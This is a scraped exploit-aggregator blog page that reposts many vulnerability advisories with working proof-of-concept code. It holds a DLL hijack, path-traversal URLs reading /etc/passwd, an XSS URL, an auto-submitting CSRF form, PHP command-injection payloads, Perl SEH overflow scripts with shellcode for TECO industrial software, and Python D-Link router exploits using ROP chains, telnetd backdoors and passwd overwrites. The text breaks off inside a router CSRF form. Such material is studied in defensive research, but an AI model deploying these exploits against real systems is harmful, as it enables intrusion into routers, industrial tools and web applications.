source: https://www.securityfocus.com/bid/61745/info
HTC Sync Manager is prone to multiple arbitrary code-execution vulnerabilities.
An attacker can exploit these issues by enticing a legitimate user to use the vulnerable application to open a file from a network share location that contains a specially crafted Dynamic Link Library (DLL) file.
HTC Sync Manager 2.1.46.0 is vulnerable; other versions may also be affected.
#include <windows.h>
#define DllExport __declspec (dllexport)
DllExport void DwmSetWindowAttribute() { egg(); }
int egg()
{
system ("calc");
exit(0);
return 0;
}
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863143938
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
source: https://www.securityfocus.com/bid/61746/info
CakePHP is prone to a local file-include vulnerability because it fails to sufficiently sanitize user-supplied input.
An attacker can exploit this vulnerability to view files or execute arbitrary script code in the context of the web server process. This may aid in further attacks.
CakePHP 2.2.8 and 2.3.7 are vulnerable; other versions may also be affected.
http://www.example.com/cakephp-2.3.7/theme/Test1/%2e.//%2e.//%2e.//%2e. //%2e.//%2e.//%2e.//%2e.//%2e.//%2e.//%2e.//%2e.//%2e./etc/passwd
http://www.example.com/cakephp-2.3.7/DebugKit/%2e.//%2e.//%2e.//%2e.// %2e.//%2e.//%2e.//%2e.//%2e.//%2e.//%2e.//%2e.//%2e./etc/passwd
source: https://www.securityfocus.com/bid/61770/info
DotNetNuke is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
DotNetNuke prior to versions 7.1.1 and 6.2.9 are vulnerable.
http://www.example.com/?__dnnVariable={'__dnn_pageload':'alert(/XSS/)'}
source: https://www.securityfocus.com/bid/61801/info
ACal is prone to a local file-include vulnerability because it fails to sufficiently sanitize user-supplied input before being used to include files.
An attacker can exploit this vulnerability to view files or execute arbitrary script code in the context of the web server process. This may aid in further attacks.
ACal 2.2.6 is vulnerable; other versions may also be affected.
http://www.example.com/calendar/embed/example/example.php?view=../../etc/passwd%00
<!--
[+] Credits: hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source:
http://hyp3rlinx.altervista.org/advisories/AS-CFIMAGEHOST-CSRF.txt
Vendor:
====================================
codefuture.co.uk/projects/imagehost
Product:
===================================
CF Image Host 1.65 - 1.6.6
Archive download listed as: version 1.65
unzips as imagehost 1.6.6
Vulnerability Type:
=================================
Cross site request forgery - CSRF
CVE Reference:
==============
N/A
Vulnerability Details:
=====================
No CSRF protection exists allowing attackers to make requests to the server
on behalf of the victim if they are logged in and visit a malicious site or
click
an infected linx. This will let attackers modify certain web application
settings to
whatever the attacker wishes.
CSRF Exploit code(s):
====================
-->
<form id='HELL' method="POST" action="
http://localhost/imagehost1.6.6/admin.php?act=set">
<input type="text" name="setScriptUrl" value="
http://hyp3rlinx.altervista.org" />
<input type="text" name="setTitle" value="ghostofsin" />
<input type="text" name="setSlogan" value="666" />
<input type="text" name="setCopyright" value="hyp3rlinx" />
<input type="text" name="setTheme" value="day" />
<input type="text" name="setModeRewrite" value="0" />
<input type="text" name="setAddThis" value="0" />
<input type="text" name="setLanguage" value="0" />
<input type="text" name="changesettings" value="Save+Changes" />
<input type="text" name="setModeRewrite" value="0" />
<input type="text" name="setAllowReport" value="1" />
<input type="text" name="setEmailReport" value="1" />
<input type="text" name="setHideGallery" value="1" />
<input type="text" name="setHideContact" value="1" />
<input type="text" name="setHideTos" value="1" />
<input type="text" name="setHideFaq" value="1" />
<input type="text" name="setHideSearch" value="1" />
<input type="text" name="setImageWidgit" value="1" />
<input type="text" name="setHideFeed" value="1" />
<input type="text" name="setHideSitemap" value="1" />
<input type="text" name="setAutoDeleted" value="0" />
<input type="text" name="setAutoDeletedTime" value="10" />
<input type="text" name="setAutoDeletedJump" value="m" />
<input type="text" name="setDisUpload" value="0" />
<input type="text" name="setAutoDeleted" value="0" />
<input type="text" name="setMaxSize" value="1048576" />
<input type="text" name="setMaxBandwidth" value="1024" />
<input type="text" name="setBandwidthReset" value="m" />
<input type="text" name="setMaxUpload" value="5" />
<input type="text" name="setNoDuplicate" value="0" />
<input type="text" name="setResizeImg" value="1" />
<input type="text" name="setPrivateImg" value="1" />
<input type="text" name="setWaterMark" value="0" />
<input type="text" name="setWatermarkText" value="0" />
<input type="text" name="setWatermarkImage" value="1" />
<input type="text" name="setWatermarkPlaced" value="1" />
<input type="text" name="setSUrlApi" value="b54" />
<input type="text" name="setSUrlApiUrl" value="" />
<input type="text" name="setSUrlApiUesr" value="" />
<input type="text" name="setSUrlApiPass" value="" />
<input type="text" name="setAnalytics" value="" />
<input type="text" name="setGoogleCha" value="" />
<input type="text" name="setGoogleAds" value="" />
<input type="text" name="oldPassword" value="" />
<input type="text" name="newPassword" value="" />
<input type="text" name="newConfirm" value="" />
<input type="text" name="setUserName" value="admin" />
<input type="text" name="setEmail" value="ghostofsin@abyss.com" />
<script>document.getElementById('HELL').submit()</script>
</form>
<!--
Disclosure Timeline:
=====================
Vendor Notification: NA
November 14, 2015 : Public Disclosure
Exploitation Technique:
=======================
Remote
Severity Level:
================
High
Description:
============================================================
Request Method(s): [+] POST
Vulnerable Product: [+] CF Image Host 1.65 - 1.6.6
[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and that due
credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit is given to
the author.
The author is not responsible for any misuse of the information contained
herein and prohibits any malicious use of all security related information
or exploits by the author or elsewhere.
by hyp3rlinx
-->
[+] Credits: hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source:
http://hyp3rlinx.altervista.org/advisories/AS-CFIMAGEHOST-PHP-CMD-INJECTION.txt
Vendor:
====================================
codefuture.co.uk/projects/imagehost
Product:
===================================
CF Image Host 1.65 - 1.6.6
Archive download listed as: version 1.65
unzips as imagehost 1.6.6
Vulnerability Type:
=====================
PHP Command Injection
CVE Reference:
==============
N/A
Vulnerability Details:
=====================
CF Imagehost allows users who have access to the management area the
ability to write directly to the 'set.php' page under
the /inc directory that stores setting values for the 'Site Title', 'Site
Slogan' etc, this allows a local attacker ability to
inject specially crafted PHP command payloads to execute arbitrary
operating system commands on the victim host. Possibly leading
to privilege escalation, RFI, backdoors etc.. and most likely full
compromise of the affected system or shared environment
if applicable.
PHP Command Injection Exploit code(s):
=====================================
Under the setting tab we can inject following below PHP code and it will
remain persistent as it is written disk in 'set.php',
afterwards when the victim visits the application and click a tab the
persistent OS command will be executed.
1) navigate to CF image host settings tab
http://localhost/imagehost1.6.6/admin.php?act=set
2) click on admin menu on left and enter your passwords DO NOT click 'Save
changes' yet! or you get error message to enter creds
3) now go back to settings tab and click 'General' then inject below PHP
code into the 'Site Title' input field
4) now click 'Save Changes', this code will get stored under /inc
directory within the 'set.php' PHP file.
our PHP injection payload needs the single quotes, double back slashes,
semicolons as described below to correctly escape the syntax
so we do not break the PHP page and cause errors, our extra \\ quoutes and
; gets removed after injection takes place.
some examples...
';echo exec("c:\\Windows\\system32\\calc.exe");'';';
'set.php' on line 11 then becomes:
$settings['SET_TITLE'] = '';echo
exec("c:\Windows\system32\calc.exe");'';';';
OR inject CMD to launch chrome.exe etc...
';echo exec("c:\\Program Files
(x86)\\Google\\Chrome\\Application\\chrome.exe");'';';
After, click on some tabs above like 'Database' or 'Ban User' and Tada!
this will execute our stored PHP command...
either running calc.exe or launching Google Chrome.
Disclosure Timeline:
=====================
Vendor Notification: NA
November 13, 2015 : Public Disclosure
Exploitation Technique:
=======================
Local / Remote
Severity Level:
================
High
Description:
================================================================
Request Method(s): [+] POST
Vulnerable Product: [+] CF Image Host 1.65 - 1.6.6
Vulnerable Parameter(s): [+] 'Site Title', 'Site Slogan' etc..
Affected Area(s): [+] OS
[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and that due
credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit is given to
the author.
The author is not responsible for any misuse of the information contained
herein and prohibits any malicious use of all security related information
or exploits by the author or elsewhere.
by hyp3rlinx
#!/usr/bin/perl
#
#
# TECO SG2 LAD Client 3.51 SEH Overwrite Buffer Overflow Exploit
#
#
# Vendor: TECO Electric and Machinery Co., Ltd.
# Product web page: http://www.teco-group.eu
# Download: http://globalsa.teco.com.tw/support_download.aspx?KindID=9
# Affected version: 3.51 and 3.40
#
# Summary: SG2 Client is a program that enables to create and edit applications.
# The program is providing two edit modes, LADDER and FBD to rapidly and directly
# input the required app. The Simulation Mode allows users to virtually run and test
# the program before it is loaded to the controller.
#
# Desc: The vulnerability is caused due to a boundary error in the processing of a
# Genie LAD file, which can be exploited to cause a buffer overflow when a user opens
# e.g. a specially crafted .GEN file. Successful exploitation could allow execution
# of arbitrary code on the affected machine.
#
# ---------------------------------------------------------------------------------
# (10bc.1358): Access violation - code c0000005 (first chance)
# First chance exceptions are reported before any exception handling.
# This exception may be expected and handled.
# eax=00000000 ebx=00000000 ecx=43434343 edx=7794b4ad esi=00000000 edi=00000000
# eip=43434343 esp=0018dc24 ebp=0018dc44 iopl=0 nv up ei pl zr na pe nc
# cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00210246
# 43434343 ?? ???
# 0:000> !exchain
# 0018dc38: ntdll!LdrRemoveLoadAsDataTable+d64 (7794b4ad)
# 0018e1d4: ntdll!LdrRemoveLoadAsDataTable+d64 (7794b4ad)
# 0018e800: MFC42!Ordinal1580+373 (708df2fc)
# 0018f098: 43434343
# Invalid exception stack at 42424242
# ---------------------------------------------------------------------------------
#
# Tested on: Microsoft Windows 7 Professional SP1 (EN) 64bit
# Microsoft Windows 7 Ultimate SP1 (EN) 64bit
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
# @zeroscience
#
#
# Advisory ID: ZSL-2015-5275
# Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5275.php
#
#
# 09.10.2015]
#
# 113 bytes MessageBox shellcode
my $sc = "\x31\xd2\xb2\x30\x64\x8b\x12\x8b\x52\x0c\x8b\x52\x1c\x8b\x42".
"\x08\x8b\x72\x20\x8b\x12\x80\x7e\x0c\x33\x75\xf2\x89\xc7\x03".
"\x78\x3c\x8b\x57\x78\x01\xc2\x8b\x7a\x20\x01\xc7\x31\xed\x8b".
"\x34\xaf\x01\xc6\x45\x81\x3e\x46\x61\x74\x61\x75\xf2\x81\x7e".
"\x08\x45\x78\x69\x74\x75\xe9\x8b\x7a\x24\x01\xc7\x66\x8b\x2c".
"\x6f\x8b\x7a\x1c\x01\xc7\x8b\x7c\xaf\xfc\x01\xc7\x68\x65\x64".
"\x21\x01\x68\x20\x50\x77\x6e\x68\x20\x5a\x53\x4c\x89\xe1\xfe".
"\x49\x0b\x31\xc0\x51\x50\xff\xd7";
# Address = 0041D659
# Message = 0x0041d659 : pop edi # pop esi # ret 0x04
# startnull {PAGE_EXECUTE_READ} [LAD.exe]
# ASLR: False;
# Rebase: False;
# SafeSEH: False;
# OS: False;
# v0.2.9.0 (C:\Program Files (x86)\TECO\SG2 Client\LAD.exe)
my $file = "lad.gen";
my $junk = "\x41" x 21750 . "\xEB\x08\x90\x90" . "\x59\xd6\x41\x00" . "\x90" x 28 . $sc . "\x90" x 20;
open($FILE,">$file");
print $FILE "$junk";
close($FILE);
print "Malicious GEN file created successfully!\n";
# TECO SG2 FBD Client 3.51 SEH Overwrite Buffer Overflow Vulnerability
#
#
# Vendor: TECO Electric and Machinery Co., Ltd.
# Product web page: http://www.teco-group.eu
# Download: http://globalsa.teco.com.tw/support_download.aspx?KindID=9
# Affected version: 3.51 and 3.40
#
# Summary: SG2 Client is a program that enables to create and edit applications.
# The program is providing two edit modes, LADDER and FBD to rapidly and directly
# input the required app. The Simulation Mode allows users to virtually run and test
# the program before it is loaded to the controller.
#
# Desc: The vulnerability is caused due to a boundary error in the processing
# of a Genie FBD, which can be exploited to cause a buffer overflow when a
# user opens e.g. a specially crafted .GFB file. Successful exploitation could
# allow execution of arbitrary code on the affected machine.
#
# ---------------------------------------------------------------------------------
# (fb0.fd0): Access violation - code c0000005 (!!! second chance !!!)
# *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\windows\SysWOW64\ntdll.dll -
# *** WARNING: Unable to verify checksum for C:\Program Files (x86)\TECO\SG2 Client\FBD.EXE
# *** ERROR: Module load completed but symbols could not be loaded for C:\Program Files (x86)\TECO\SG2 Client\FBD.EXE
# eax=4141413f ebx=00000004 ecx=41414141 edx=41414141 esi=0018f578 edi=00a642e8
# eip=00440b57 esp=0018ef9c ebp=0000003f iopl=0 nv up ei pl nz na po nc
# cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010202
# FBD+0x40b57:
# 00440b57 8995a0000000 mov dword ptr [ebp+0A0h],edx ss:002b:000000df=????????
# ---------------------------------------------------------------------------------
#
# Tested on: Microsoft Windows 7 Professional SP1 (EN) 64bit
# Microsoft Windows 7 Ultimate SP1 (EN) 64bit
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
# @zeroscience
#
#
# Advisory ID: ZSL-2015-5276
# Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5276.php
#
#
# 09.10.2015
#
PoC:
- http://zeroscience.mk/codes/sg2fbd-5276.zip
- https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38701.zip
# TECO TP3-PCLINK 2.1 TPC File Handling Buffer Overflow Vulnerability
#
#
# Vendor: TECO Electric and Machinery Co., Ltd.
# Product web page: http://www.teco-group.eu
# Affected version: 2.1
#
# Summary: TP3-PCLINK Software is the supportive software for TP03, providing
# three edit modes as LADDER, IL ,FBDand SFC, by which programs can be input
# rapidly and correctly.
#
# Desc: The vulnerability is caused due to a boundary error in the processing
# of a project file, which can be exploited to cause a buffer overflow when a
# user opens e.g. a specially crafted .TPC file. Successful exploitation could
# allow execution of arbitrary code on the affected machine.
#
# ---------------------------------------------------------------------------------
# (794.193c): C++ EH exception - code e06d7363 (first chance)
# Critical error detected c0000374
# (794.193c): Break instruction exception - code 80000003 (first chance)
# eax=00000000 ebx=00000000 ecx=778f0b42 edx=0018db71 esi=02730000 edi=41414141
# eip=7794e725 esp=0018ddc4 ebp=0018de3c iopl=0 nv up ei pl nz na po nc
# cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200202
# ntdll!RtlpNtEnumerateSubKey+0x1af8:
# 7794e725 cc int 3
# ---------------------------------------------------------------------------------
#
# Tested on: Microsoft Windows 7 Professional SP1 (EN) 64bit
# Microsoft Windows 7 Ultimate SP1 (EN) 64bit
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
# @zeroscience
#
#
# Advisory ID: ZSL-2015-5277
# Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5277.php
#
#
# 09.10.2015
#
PoC:
- http://zeroscience.mk/codes/tp3tpc-5277.zip
- https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38702.zip
# TECO AP-PCLINK 1.094 TPC File Handling Buffer Overflow Vulnerability
#
#
# Vendor: TECO Electric and Machinery Co., Ltd.
# Product web page: http://www.teco-group.eu
# Download: http://globalsa.teco.com.tw/support_download.aspx?KindID=9
# Affected version: 1.094
#
# Summary: AP-PCLINK is the supportive software for TP03 or AP series, providing
# three edit modes as LADDER, IL, FBDand SFC, by which programs can be input rapidly
# and correctly. Every form written into the TP03 or AP series and AP-PCLINK can
# be monitored in the form of the data.
#
# Desc: The vulnerability is caused due to a boundary error in the processing
# of a project file, which can be exploited to cause a buffer overflow when a
# user opens e.g. a specially crafted .TPC file. Successful exploitation could
# allow execution of arbitrary code on the affected machine.
#
# ---------------------------------------------------------------------------------
# Critical error detected c0000374
# (1950.ff0): Break instruction exception - code 80000003 (first chance)
# eax=00000000 ebx=00000000 ecx=76f70b42 edx=0018d98d esi=00360000 edi=41414141
# eip=76fce725 esp=0018dbe0 ebp=0018dc58 iopl=0 nv up ei pl nz na po nc
# cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200202
# ntdll!RtlpNtEnumerateSubKey+0x1af8:
# 76fce725 cc int 3
# ---------------------------------------------------------------------------------
#
# Tested on: Microsoft Windows 7 Professional SP1 (EN) 64bit
# Microsoft Windows 7 Ultimate SP1 (EN) 64bit
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
# @zeroscience
#
#
# Advisory ID: ZSL-2015-5278
# Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5278.php
#
#
# 09.10.2015
#
PoC:
- http://zeroscience.mk/codes/aptpc-5278.zip
- https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38703.zip
#!/usr/bin/perl
#
#
# TECO JN5 L510-DriveLink 1.482 SEH Overwrite Buffer Overflow Exploit
#
#
# Vendor: TECO Electric and Machinery Co., Ltd.
# Product web page: http://www.teco-group.eu
# Download: http://globalsa.teco.com.tw/support_download.aspx?KindID=9
# Affected version: 1.482 and 1.462
#
# Summary: JN5 DriveLink is a free program that enables you to
# configure the AC Motor Drive, 510 Series PC-Link. It provides
# support for sleep and fire modes favourable for pumps, fans,
# compressors, and HVAC and communication network protocol of
# Modbus/ BACnet/ Metasys N2.
#
# Desc: The vulnerability is caused due to a boundary error in the
# processing of a project file, which can be exploited to cause a
# buffer overflow when a user opens e.g. a specially crafted .LF5 file.
# Successful exploitation could allow execution of arbitrary code on
# the affected machine.
#
# ---------------------------------------------------------------------------------
# (14c0.12ec): Access violation - code c0000005 (first chance)
# First chance exceptions are reported before any exception handling.
# This exception may be expected and handled.
# *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Windows\system32\MFC42.DLL -
# *** WARNING: Unable to verify checksum for C:\Program Files (x86)\TECO\JN5 DriveLink\L510-DriveLink\L510-DriveLink.exe
# *** ERROR: Module load completed but symbols could not be loaded for C:\Program Files (x86)\TECO\JN5 DriveLink\L510-DriveLink\L510-DriveLink.exe
# eax=000026a0 ebx=0018f430 ecx=41414141 edx=00000001 esi=0018f408 edi=ffffd961
# eip=70735d7e esp=0018f350 ebp=0018f364 iopl=0 nv up ei ng nz na po nc
# cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00210282
# MFC42!Ordinal2740+0xaa:
# 70735d7e 8b01 mov eax,dword ptr [ecx] ds:002b:41414141=????????
# 0:000> !exchain
# 0018f3e4: 41414141
# Invalid exception stack at 41414141
# ---------------------------------------------------------------------------------
#
# Tested on: Microsoft Windows 7 Professional SP1 (EN) 64bit
# Microsoft Windows 7 Ultimate SP1 (EN) 64bit
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
# @zeroscience
#
#
# Advisory ID: ZSL-2015-5279
# Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5279.php
#
#
# 09.10.2015]
#
my $header = "\x04\x00\x00\x00\x0A\x00\x00\x00\x4C\x35\x31\x30\x2D\x31".
"\x50\x32\x2D\x48\x0E\x00\x00\x00\x14\x00\x00\x00\x01\x00";
# 113 bytes MessageBox shellcode
my $sc = "\x31\xd2\xb2\x30\x64\x8b\x12\x8b\x52\x0c\x8b\x52\x1c\x8b\x42".
"\x08\x8b\x72\x20\x8b\x12\x80\x7e\x0c\x33\x75\xf2\x89\xc7\x03".
"\x78\x3c\x8b\x57\x78\x01\xc2\x8b\x7a\x20\x01\xc7\x31\xed\x8b".
"\x34\xaf\x01\xc6\x45\x81\x3e\x46\x61\x74\x61\x75\xf2\x81\x7e".
"\x08\x45\x78\x69\x74\x75\xe9\x8b\x7a\x24\x01\xc7\x66\x8b\x2c".
"\x6f\x8b\x7a\x1c\x01\xc7\x8b\x7c\xaf\xfc\x01\xc7\x68\x65\x64".
"\x21\x01\x68\x20\x50\x77\x6e\x68\x20\x5a\x53\x4c\x89\xe1\xfe".
"\x49\x0b\x31\xc0\x51\x50\xff\xd7";
my $buffer = "A" x 43 . "\xEB\x06\x90\x90" . "\xB0\x5D\x40\x00" . "\x90" x 16 . $sc . "\x90" x 20 . "D" x 2627;
my $file = "Gaming Nerdz.lf5";
my $junk = $header.$buffer;
open($FILE,">$file");
print $FILE "$junk";
close($FILE);
print "Malicious LF5 file created successfully!\n";
## Advisory Information
Title: DIR-815 Buffer overflows and Command injection in authentication and HNAP functionalities
Vendors contacted: William Brown <william.brown@dlink.com>, Patrick Cline patrick.cline@dlink.com(Dlink)
CVE: None
Note: All these security issues have been discussed with the vendor and vendor indicated that they have fixed issues as per the email communication. The vendor had also released the information on their security advisory pages http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10060,
http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10061
However, the vendor has taken now the security advisory pages down and hence the information needs to be publicly accessible so that users using these devices can update the router firmwares. The author (Samuel Huntley) releasing this finding is not responsible for anyone using this information for malicious purposes.
## Product Description
DIR-815 -- Wireless N300 Dual Band Router. Mainly used by home and small offices.
## Vulnerabilities Summary
Have come across 3 security issues in DIR-815 firmware which allows an attacker to exploit command injection and buffer overflows in authentication adn HNAP functionality. All of them can be exploited by an unauthentictaed attacker. The attacker can be on wireless LAN or WAN if mgmt interface is exposed to attack directly or using XSRF if not exposed.
## Details
Buffer overflow in auth
----------------------------------------------------------------------------------------------------------------------
import urllib
import urllib2
# This exploits the auth_main.cgi with read buffer overflow exploit for v2.02
# prequisite is just to have id and password fields in params
url = 'http://192.168.0.1/authentication.cgi'
junk = "A"*1004+"B"*37+"\x58\xf8\x40\x00" # address of system function in executable
junk+="X"*164+'echo "Admin" "Admin" "0" > /var/passwd\x00'+"AAAA"
values = "id=test&password=test&test="+junk
req = urllib2.Request(url, values)
response = urllib2.urlopen(req)
the_page = response.read()
----------------------------------------------------------------------------------------------------------------------
Buffer overflow in HNAP
----------------------------------------------------------------------------------------------------------------------
import socket
import struct
# format junk+ROP1(have right value in A0) + ROP2(add or subtract to create right system address) + ROP3(Jump to right address)
buf = "POST /HNAP1/ HTTP/1.0\r\nHOST: 192.168.1.8\r\nUser-Agent: test\r\nContent-Length: 1\r\nSOAPAction:http://purenetworks.com/HNAP1/GetDeviceSettings/XX" + ";sh;"+"H"*286
buf+= "\x40\xF4\xB1\x2A" # (ROP gadget which puts right value in A0)
buf+= "B"*20+"ZZZZ"+"telnetd -p 6778"+"C"*5 # adjustment to get to the right payload
buf+="\xA0\xb2\xb4\x2a" # The system address is 2Ab4b200 so changing that in GDB just before jumping to test if it works which it does not
buf+= "\r\n" + "1\r\n\r\n"
print "[+] sending buffer size", len(buf)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("1.2.3.4", 80))
s.send(buf)
----------------------------------------------------------------------------------------------------------------------
Command injection in
----------------------------------------------------------------------------------------------------------------------
import socket
import struct
# CSRF or any other trickery, but probably only works when connected to network I suppose
buf = "POST /HNAP1/ HTTP/1.0\r\nHOST: 99.249.143.124\r\nUser-Agent: test\r\nContent-Length: 1\r\nSOAPAction:http://purenetworks.com/HNAP1/GetDeviceSettings/XX" + ';telnetd -p 9090;\r\n' + "1\r\n\r\n"
print "[+] sending buffer size", len(buf)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("192.168.0.1", 80))
s.send(buf)
----------------------------------------------------------------------------------------------------------------------
## Report Timeline
* April 26, 2015: Vulnerability found by Samuel Huntley and reported to William Brown and Patrick Cline.
* July 17, 2015: Vulnerability was fixed by Dlink as per the email sent by the vendor
* Nov 13, 2015: A public advisory is sent to security mailing lists.
## Credit
This vulnerability was found by Samuel Huntley
## Advisory Information
Title: Dlink DIR-645 UPNP Buffer Overflow
Vendors contacted: William Brown <william.brown@dlink.com> (Dlink)
Release mode: Released
CVE: None
Note: All these security issues have been discussed with the vendor and vendor indicated that they have fixed issues as per the email communication. The vendor had also released the information on their security advisory pages http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10060,
http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10061
However, the vendor has taken now the security advisory pages down and hence the information needs to be publicly accessible so that users using these devices can update the router firmwares. The author (Samuel Huntley) releasing this finding is not responsible for anyone using this information for malicious purposes.
## Product Description
DIR-645 -- Whole Home Router 1000 from Dlink. Mainly used by home and small offices.
## Vulnerabilities Summary
I have come across 2 security issues in DIR-645 firmware which allows an attacker on wireless LAN and possibly WAN network to execute command injection and buffer overflow attack against the wireless router. I have provided exploit scripts written in python that give details of the exploits. The buffer overflow does not have a payload at this time, however if you watch the exploit in a debugger, then it can be clearly seen that the payload uses ROP techniques to get to stack payload which is a bunch of C's for now on the stack. It can be replaced with any payload that works on MIPS little endian architecture.
## Details
# Command injection
----------------------------------------------------------------------------------------------------------------------
import socket
import struct
buf = "POST /HNAP1/ HTTP/1.0\r\nHOST: 192.168.1.8\r\nUser-Agent: test\r\nContent-Length: 1\r\nSOAPAction:http://purenetworks.com/HNAP1/GetDeviceSettings/XX" + 'test;telnetd -p 9656;test\r\n' + "1\r\n\r\n"
print "[+] sending buffer size", len(buf)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("10.0.0.90", 80))
s.send(buf)
----------------------------------------------------------------------------------------------------------------------
# Buffer overflow
----------------------------------------------------------------------------------------------------------------------
import socket
import struct
exploit_buffer = "POST /HNAP1/ HTTP/1.0\r\nHOST: 10.0.0.1\r\nUser-Agent: test\r\nContent-Length: 1\r\nSOAPAction:http://purenetworks.com/HNAP1/GetDeviceSettings/XX" + ";pt;"+"B"*158
exploit_buffer+="C"*50+"Z"*46
exploit_buffer+="\xb4\x67\xb3\x2a"
exploit_buffer+="\xd0\xeb\xb4\x2a"
exploit_buffer+="VVVV"
a
exploit_buffer+="\x7c\xba\xb1\x2a"
exploit_buffer+="K"*16
exploit_buffer+="\x44\x3b\xb0\x2A"
exploit_buffer+="A"*36
exploit_buffer+="\xf0\x5e\xb0\x2A"
exploit_buffer+="H"*16
exploit_buffer+="C"*212+"\r\n" + "1\r\n\r\n"
print "[+] sending exploit_bufferfer size", len(exploit_buffer)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("10.0.0.1", 80))
s.send(exploit_buffer)
----------------------------------------------------------------------------------------------------------------------
## Report Timeline
* Jan 22, 2015: Vulnerability found by Samuel Huntley by William Brown.
* Feb 15, 2015: Vulnerability is patched by Dlink
* Nov 13, 2015: A public advisory is sent to security mailing lists.
## Credit
This vulnerability was found by Samuel Huntley
## Advisory Information
Title: Dlink DIR-615 Authenticated Buffer overflow in Ping and Send email functionality
Vendors contacted: William Brown <william.brown@dlink.com>, Patrick Cline patrick.cline@dlink.com(Dlink)
CVE: None
Note: All these security issues have been discussed with the vendor and vendor indicated that they have fixed issues as per the email communication. The vendor had also released the information on their security advisory pages http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10060,
http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10061
However, the vendor has taken now the security advisory pages down and hence the information needs to be publicly accessible so that users using these devices can update the router firmwares. The author (Samuel Huntley) releasing this finding is not responsible for anyone using this information for malicious purposes.
## Product Description
DIR-615 -- Wireless N300 router from Dlink. Mainly used by home and small offices.
## Vulnerabilities Summary
I have come across 2 security issues in DIR-615 firmware which allows an attacker using XSRF attack to exploit buffer overflow vulnerabilities in ping and send email functionality.
## Details
# Ping buffer oberflow
----------------------------------------------------------------------------------------------------------------------
<!-- reboot shellcode Big Endian MIPS-->
<html>
<body>
<form id="form5" name="form5" enctype="text/plain" method="post" action="http://192.168.100.14/ping_response.cgi">
<input type="text" id="html_response_page" name="html_response_page" value="tools_vct.asp&html_response_return_page=tools_vct.asp&action=ping_test&ping_ipaddr=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA%2A%BF%99%F4%2A%C1%1C%30AAAA%2A%BF%8F%04CCCC%2A%BC%9B%9CEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE%2A%BC%BD%90FFFFFFFFFFFFFFFF%3c%06%43%21%34%c6%fe%dc%3c%05%28%12%34%a5%19%69%3c%04%fe%e1%34%84%de%ad%24%02%0f%f8%01%01%01%0c&ping=ping"></td>
<input type=submit value="submit">
</form>
</body>
</html>
----------------------------------------------------------------------------------------------------------------------
# Send email buffer overflow
----------------------------------------------------------------------------------------------------------------------
<!-- reboot shellcode Big Endian MIPS-->
<html>
<body>
<form id="form5" name="form5" enctype="text/plain" method="post" action="http://192.168.100.14/send_log_email.cgi">
